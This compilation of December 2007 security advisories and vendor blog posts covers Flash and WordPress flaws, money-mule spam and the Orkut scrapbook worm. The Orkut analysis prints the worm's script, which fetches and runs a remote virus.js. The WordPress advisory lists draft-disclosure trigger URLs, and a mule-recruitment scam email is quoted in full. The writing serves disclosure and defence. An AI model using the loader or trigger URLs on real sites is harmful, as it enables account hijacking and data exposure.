Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Adobe Flash Player Multiple Vulnerabilities

Secunia Advisory:
SA28161

Release Date:
2007-12-19

Last Update:
2007-12-20

Critical:

Highly critical

Impact:
Unknown
Security Bypass
Cross Site Scripting
Manipulation of data
Exposure of sensitive information
Privilege escalation
DoS
System access

Where:
From remote

Solution Status:
Vendor Patch

Software:
Adobe Flash CS3
Adobe Flash Player 9.x
Adobe Flex 2.x
Macromedia Flash 8.x
Macromedia Flash Player 7.x
Macromedia Flash Player 8.x

CVE reference:
CVE-2007-4324
CVE-2007-4768
CVE-2007-5275
CVE-2007-5476
CVE-2007-6242
CVE-2007-6243
CVE-2007-6244
CVE-2007-6245
CVE-2007-6246

Description:
Some vulnerabilities have been reported in Adobe Flash Player, where one vulnerability has an unknown impact and others can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions, conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or to potentially compromise a user's system.

1) An error when parsing specially crafted regular expressions can be exploited to cause a heap-based buffer overflow.

For more information see vulnerability #7 in:
SA27543

2) An error exists in the processing of SWF embedded JPG images. This can be exploited to corrupt the heap via specially crafted X and Y densities specified in the JPG header.

3) An error exists when pinning a hostname to an IP address. This can be exploited to conduct DNS rebinding attacks via allow-access-from elements in cross-domain-policy XML documents.

4) An error exists in the enforcing of cross-domain policy files. This can be exploited to bypass certain security restrictions on web servers hosting cross-domain policy files.

5) Input passed to unspecified parameters when handling the "asfunction:" protocol is not properly sanitised before being returned to the user. This can be exploited to inject arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerability does not affect Flash Player 7.

6) An error exists within the processing of the "navigateToURL" function. This can be exploited to execute arbitrary script code in the security context of another domain via a specially crafted "javascript:" URI.

The vulnerability only affects the Flash Player ActiveX Control for Internet Explorer.

7) An unspecified error can be exploited to modify HTTP headers and conduct HTTP request splitting attacks.

8) An error within the implementation of the Socket or XMLSocket ActionScript classes can be exploited to determine if a port on a remote host is opened or closed.

9) An error within the setting of memory permissions in Adobe Flash Player for Linux can be exploited by malicious, local users to gain escalated privileges.

10) An unspecified error exists in Adobe Flash Player and Opera on Mac OS X.

For more information see vulnerability #3 in:
SA27277

The vulnerabilities are reported in versions prior to 9.0.115.0.


Solution:
Update to version 9.0.115.0.

Flash Player 9.0.48.0 and earlier for Windows, Mac, and Linux:
http://www.stage.adobe.com/go/getflash

Flash Player 9.0.48.0 and earlier - network distribution:
http://www.stage.adobe.com/licensing/distribution

Flash CS3 Professional:
http://www.adobe.com/support/flash/downloads.html

Flex 2.0:
http://www.stage.adobe.com/support/flashplayer/downloads.html#fp9

NOTE: This is reportedly the final security bulletin that Adobe will supply for users of Adobe Flash Player 7 (formerly Macromedia Flash Player 7).

Provided and/or discovered by:
1) The vendor credits Tavis Ormandy and Will Drewry of the Google Security Team.
2) Aaron Portnoy of TippingPoint DVLabs.
3) The vendor credits Dan Boneh, Adam Barth, Andrew Bortz, Collin Jackson, and Weidong Shao of Stanford University.
4, 7) Toshiharu Sugiyama of UBsecure, Inc. and JPCERT/CC.
5) The vendor credits Rich Cannings of the Google Security Team.
6) Collin Jackson and Adam Barth of Stanford University.
9) The vendor credits Jesse Michael and Thomas Biege of SUSE.
10) The vendor credits Opera.

Changelog:
2007-12-20: Updated advisory with additional information. Added link to US-CERT. Updated "Original Advisory" section.

Original Advisory:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb07-20.html

TippingPoint DVLabs:
http://dvlabs.tippingpoint.com/advisory/TPTI-07-21

JVN:
http://jvn.jp/jp/JVN%2345675516/index.html
http://jvn.jp/jp/JVN%2350876069/index.html

Stanford:
http://crypto.stanford.edu/advisories/CVE-2007-6244/

Other References:
SA27543:
http://secunia.com/advisories/27543/

SA27277:
http://secunia.com/advisories/27277/

US-CERT VU#758769:
http://www.kb.cert.org/vuls/id/758769

Source: Adobe Flash Player Multiple Vulnerabilities - Advisories - Secunia

 

WordPress Draft Information Disclosure

Secunia Advisory:
SA28130

Release Date:
2007-12-19

Critical:

Less critical

Impact:
Security Bypass
Exposure of sensitive information

Where:
From remote

Solution Status:
Unpatched

Software:
WordPress 2.x

Description:
Michael Brooks has discovered a vulnerability in WordPress, which can be exploited by malicious people to bypass certain security restrictions and to disclose sensitive information.

The application does not properly restrict access to posted drafts to users with valid administrator credentials. This can be exploited to read drafts by accessing the index.php script with data in the "PATH_INFO" URL part ending with "wp-admin/".

Examples:
http://[host]/[path]/index.php/wp-admin/
http://[host]/[path]/index.php/test-wp-admin/

The vulnerability is confirmed in version 2.3.1. Other versions may also be affected.
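Because the trigger is a request routed through index.php whose PATH_INFO ends in "wp-admin/", the two example URLs above are easy to spot in a web server access log. The following is an added example (not from Secunia or WordPress) that scans constructed log lines for that pattern; the log format, the case folding and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Apache/nginx combined-style access log line (constructed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def path_info_via_index(target):
    """PATH_INFO of a request routed through index.php, or None.
    '/blog/index.php/test-wp-admin/?x=1' -> '/test-wp-admin/'"""
    path = unquote(target.split('?', 1)[0])   # drop query, undo %-encoding
    marker = '/index.php/'
    i = path.find(marker)
    return None if i < 0 else path[i + len(marker) - 1:]

def is_draft_probe(target):
    """True when PATH_INFO ends in 'wp-admin/', the trigger SA28130 describes.
    Normal admin traffic hits /wp-admin/ directly, not index.php/...wp-admin/,
    so this pattern is rarely legitimate. Case folding is an added assumption."""
    pi = path_info_via_index(target)
    return pi is not None and pi.lower().endswith('wp-admin/')

def scan_log(lines):
    """Return (ip, target, status) for every request matching the probe pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_draft_probe(m['target']):
            hits.append((m['ip'], m['target'], int(m['status'])))
    return hits

# Constructed sample log lines, not real traffic (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Dec/2007:10:01:02 +0000] "GET /blog/index.php/wp-admin/ HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/Dec/2007:10:01:09 +0000] "GET /blog/index.php/test-wp-admin/?p=1 HTTP/1.1" 200 5133',
    '198.51.100.7 - - [19/Dec/2007:10:02:00 +0000] "GET /blog/index.php/2007/12/hello-world/ HTTP/1.1" 200 4800',
    '198.51.100.9 - - [19/Dec/2007:10:02:30 +0000] "GET /blog/wp-admin/post.php HTTP/1.1" 302 0',
    '203.0.113.5 - - [19/Dec/2007:10:03:00 +0000] "GET /blog/index.php/WP-ADMIN%2F HTTP/1.1" 200 5120',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print('possible draft-disclosure probe:', hit)
```

A 200 response on such a request is the interesting case; a draft that should have been hidden was most likely served.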

Solution:
Do not post sensitive information as drafts.

Provided and/or discovered by:
Michael Brooks

Source: WordPress Draft Information Disclosure - Advisories - Secunia

 

Red Cross money mule recruitment
Posted by Mikko @ 20:43 GMT |


Money mule recruitment is getting more and more blatant. We just ran across a spam run that uses Red Cross as the lure to recruit people for money laundering.
Example below (emphasis ours):

From: American Red Cross (glurp@sxhighway.gov.cn)
Subject: Red Cross and its new Projects in Europe. Join now!
American Red Cross Donation Department is looking for new partners in European region.
With over 30 million US dollars offered as charity funds for EU Projects, American Red Cross Charity Department needs more employees in European Union.
The vacancy available at the moment is "Donation Collector"
Since we receive regular moneyed assistance for our Organisation in checks, money orders, bank wire transfers and even in gifts, be aware that "Donation Collector's" duties would include regular cooperation with our Financial Department. Every day we receive a great deal of contribution from thousands of people, but unfortunately do not have enough employees to guarantee that these donations are contributed to the purpose they were meant for in the very beginning of our program.
"Donation Collector" together with our financial missionaries in different regions of EU receives and sends donations to the people in need and furthermore is committed to minimise the chances of any unsolicited use of these funds by any other third party.
The vacancy is not a non-profit work. Regular monthly salary of 2500 EUR is paid in the end of every working month.
If you have what it takes to be successful in this job, and are interested in the career with real career growth, promotion chances, then apply online, send to HR DEPARTMENT (link to a Yahoo email address)

Source: Red Cross money mule recruitment - F-Secure Weblog : News from the Lab

 

Arrested mules
Posted by Patrik @ 04:20 GMT |


Over the last few days we've done a few posts on money mules, and today it was announced that the Dutch police have arrested 14 suspected money mules for money laundering. The mules had received money from phishing scams targeting ABN AMRO using servers in Hong Kong and forwarded the money to Russia and other countries.

Arrested money mules

This is the thing if you sign up for one of these money mule jobs. The money trail leads to you, not the perps ending up with the money. Don't do it.
Full story here

Source: Arrested mules - F-Secure Weblog : News from the Lab

 

Worm on Google's Orkut
Posted by Mikko @ 14:46 GMT |


Google's Orkut social networking site has been hit by a web worm.
This one used a vulnerability in the "scrapbook" feature of the site. It infected almost 400,000 accounts before it was shut down by removing a download file it needed to operate.
Orkut
More information here and here and, hopefully soon, also at the official Orkut blog.

Source: Worm on Google's Orkut - F-Secure Weblog : News from the Lab

 

Orkut spam worm spotted!

Wednesday December 19, 2007 at 1:25 pm CST
Posted by Vinay Mahadik


I analyzed some suspicious scrap “2008 vem ai… que ele comece mto bem para vc” from a bunch of friends on Orkut. For a while it was all over Orkut!! Translated to English, it reads “2008 is coming…I wish that it begins quite well for you”.

The HTML source of the scrapbook gives:

<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '408030725', '1', '1', '9', '#FFFFFF',
'autohigh', '', '', '408030725');
flashWriter._addParam('wmode', 'transparent');
script=document.createElement('script');
script.src='http://files.[REMOVED].com/virusdoorkut/files/virus.js';
document.getElementsByTagName('head')[0].appendChild(script);
escape(''); flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv408030725');
</script>

When an Orkut user receives this malicious scrap, the browser downloads and executes the embedded virus.js script. It seems to do at least 2 things (it’s obfuscated and compacted, and I am writing this without any detailed analysis of the script so far) - scrap your friends with the same virulent message, and add your account to an Orkut community “Infectados pelo Vírus do Orkut” (”Infected by Orkut Virus” in English) created by the script author:

http://www.orkut.com/Community.aspx?cmm=44001818

A more detailed review of W32/KutWormer can be found in the Avert Labs Threat Library here.

As of the time of this writing, it had about 400,000 members (victims of this spam-worm). Apart from this, the worm doesn’t seem to affect your machine in any way. As I am writing this blog, I have seen the scraps disappearing so it looks like Orkut/Google are fighting back.

This clearly illustrates the issue with allowing rich-content on social/professional networking sites, and not sanitizing it enough. The ability to add Flash/Javascript content to Orkut scraps was only recently introduced.

Source: Computer Security Research - McAfee Avert Labs Blog

 

Orkut/Google Worms Compromise Over 400,000 Accounts

December 19th, 2007 by Robert McArdle

There appears to be a Web worm that has replicated at an alarming rate through Google’s Orkut social network in the last few hours.

Infection starts when the user is sent an email telling them that they have a new Scrapbook entry (essentially a guestbook). Upon visiting their page the user sees the text:

“2008 vem ai… que ele comece mto bem para vc”

No interaction is necessary; simply looking at the scrap starts the infection sequence. The scrap deletes itself, and the user is added to the Orkut Community “Infectados pelo Vírus do Orkut.” It then downloads and executes a heavily obfuscated JavaScript from http://files.myopera.com/virusdoorkut/[REMOVED]/virus.js, which in turn sends a copy of the original Scrapbook post to all of the user’s Orkut Contacts, so that they too will be infected by the threat.

At last count the group had over 400,000 users who had been infected. A Google translation of the group's description reads:

“CALMA!

If you came into this community, make sure that no data was stolen and not your will, that is not my goal.

If I are sure at the end of all, this community should is lotada of people

This just to show how Orkut may be dangerous, you came up here without clicking absolutely no link malicious, everything was done reading scraps.”

It appears from both the script which we have analysed and this description that this script was designed purely to spread, rather than for more malicious purposes normally associated with this type of attack. The author has since pulled the malicious JavaScript from the Web, having apparently gotten his point across.

The attack works because Orkut allows users to embed Flash content in their scrap posts (although it does filter for normal XSS techniques). The author appears to have created a SWFObject that calls the malicious JavaScript and was able to use this to bypass Orkut's filters.

This is not the first time a worm like this has targeted a social network. MySpace fell victim to the infamous “Samy Is My Hero” XSS Worm released in 2005.

Luckily for the almost half a million users, this was purely a proof of concept. The possible implications of a more malicious attack in the future however are much more worrying.
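Both the HTML source in the Avert Labs post and the explanation above point at the same root cause: poster-supplied scrap content is spliced into a JavaScript string literal in the SWFObject call, so a value that closes the literal is executed as code, and an XSS filter aimed at HTML does not see it. The following is an added example (not Orkut's code, whose server-side template is not public) that shows that unsafe concatenation next to a renderer that allow-lists the URL and encodes for the script context; the simplified template, the host allow-list and the function names are assumptions.

```python
import json
from urllib.parse import urlsplit

# Simplified shape of the script Orkut emitted for a Flash scrap (see the HTML source
# above); the URL and id come from the poster. Template and names are assumptions.
TEMPLATE = "var flashWriter = new _SWFObject({url}, {id}, '1', '1', '9', '#FFFFFF');"

def render_embed_unsafe(swf_url, swf_id):
    """Splices user data into a JS string literal with nothing but quote marks around it.
    A value containing ') ends the literal and the call, and what follows is code."""
    return TEMPLATE.format(url="'" + swf_url + "'", id="'" + swf_id + "'")

def js_string_literal(value):
    """Encode a value for a JavaScript string context inside a <script> block.
    json.dumps escapes quotes, backslashes, control and non-ASCII characters;
    '<' and '>' are encoded too so the literal can never contain '</script>'."""
    return json.dumps(value).replace('<', '\\u003c').replace('>', '\\u003e')

def render_embed_safe(swf_url, swf_id, allowed_hosts):
    """Allow-list the URL (scheme and host), then encode for the output context.
    The allow-list alone is not enough: a URL that starts with a permitted host
    and then breaks out of the literal still parses with that hostname; the
    encoding is what keeps the whole value inside one string."""
    parts = urlsplit(swf_url)
    if parts.scheme not in ('http', 'https'):
        raise ValueError('scheme not allowed: %r' % parts.scheme)
    if parts.hostname not in allowed_hosts:
        raise ValueError('host not allowed: %r' % parts.hostname)
    if not swf_id.isdigit():
        raise ValueError('id must be numeric')
    return TEMPLATE.format(url=js_string_literal(swf_url), id=js_string_literal(swf_id))

if __name__ == '__main__':
    print(render_embed_safe('http://www.orkut.com/LoL.aspx', '408030725', {'www.orkut.com'}))
```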

Source: Orkut/Google Worms Compromise Over 400,000 Accounts - TrendLabs | Malware Blog - by Trend Micro

 

Identity Theft Made Easy

December 19th, 2007 by Robert McArdle

In today’s world of social networking sites, finding enough information to impersonate someone is trivial at best. The only difficult part of the process is tracking down an individual from, say, their email address to their profile on a MySpace or Bebo page. With the new OpenSocial initiative, this has become a lot easier to do.

Sites such as Spokeo, Spock and a whole host of others will gladly trawl all available OpenSocial social networks if supplied with an email address of a “friend.” The full list of services implemented depends on the site, but a full list of the services provided by Spokeo is available here. This stuff is a dream come true for identity thieves.

Let’s take an example. I decided to use my own email address and see what I could find out about myself. Now it should be noted that I do not take part in a lot of online social networking, so this should yield higher results in most cases. Also, I deliberately set my status to “public” on the networks that I do frequent for the purposes of the experiment as these services (luckily) will not trawl private pages.

The search showed my Bebo account, Picasa account, my personal blog, my Amazon WishList and all entries I have made to Digg.com. Note that OpenSocial does not include Facebook, so that did not show up. I have been careful to keep personal data off the Web, but had completely forgotten about the Picasa and Amazon pages.

For added effect, I decided to pick one of my friends at random, and just using their email address, to find out as much about them as possible. Obviously I won’t call out the exact details, but here’s a taster: name, address, date of birth, photos, family members, location of work plus full education/work history, phone number, likes/dislikes, pets, and a whole lot more.

Considering that most banks ask for less information than that when changing details, you begin to get an idea of how big an issue this is.

My advice for people out there using social networking sites is to mark your profiles as private wherever possible. You could even use one of the services mentioned above to check what information you have left open—if you are comfortable giving them the logins to your accounts of course.

Source: Identity Theft Made Easy - TrendLabs | Malware Blog - by Trend Micro

********************************************************************

Title: Microsoft Security Bulletin Minor Revisions

Issued: December 19, 2007

********************************************************************

Summary

=======

The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-063 - Important

* MS07-064 - Critical

* MS07-065 - Important

* MS07-066 - Important

* MS07-068 - Critical

* MS07-069 - Critical

Bulletin Information:

=====================

* MS07-063 - Important

http://www.microsoft.com/technet/security/bulletin/ms07-063.mspx

- Reason for Revision: Bulletin updated to reflect a change to the Removal Information text in the Reference Table portion of the Security Update Information section.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Critical

- Version: 1.1

* MS07-064 - Critical

http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx

- Reason for Revision: Bulletin updated to reflect a change to the Removal Information text in the Windows Vista Reference Table portion of the Security Update Information section. Also removed the web-based mitigation from vulnerability CVE-2007-3901.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Critical

- Version: 1.2

* MS07-065 - Important

http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

- Reason for Revision: Bulletin updated to combine references to Windows 2000 Professional and Windows 2000 Server with a reference to Windows 2000 due to both platforms sharing the same vulnerability and severity.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Important

- Version: 1.2

* MS07-066 - Important

http://www.microsoft.com/technet/security/bulletin/ms07-066.mspx

- Reason for Revision: Bulletin updated to reflect a change to the Removal Information text in the Reference Table portion of the Security Update Information section.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Important

- Version: 1.2

* MS07-068 - Critical

http://www.microsoft.com/technet/security/bulletin/ms07-068.mspx

- Reason for Revision: Bulletin updated to reflect a change to the Removal Information text in the Reference Table portion of the Security Update Information section for Windows Vista.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Critical

- Version: 1.1

* MS07-069 - Critical

http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx

- Reason for Revision: Bulletin updated to reflect a known issue; a change to the Removal Information text in the Windows Vista Reference Table in the Security Update Information section; and a change to the File Information text in the Reference Table within the Security Update Information section for all affected operating systems.

- Originally posted: December 11, 2007

- Updated: December 18, 2007

- Bulletin Severity Rating: Critical

- Version: 1.2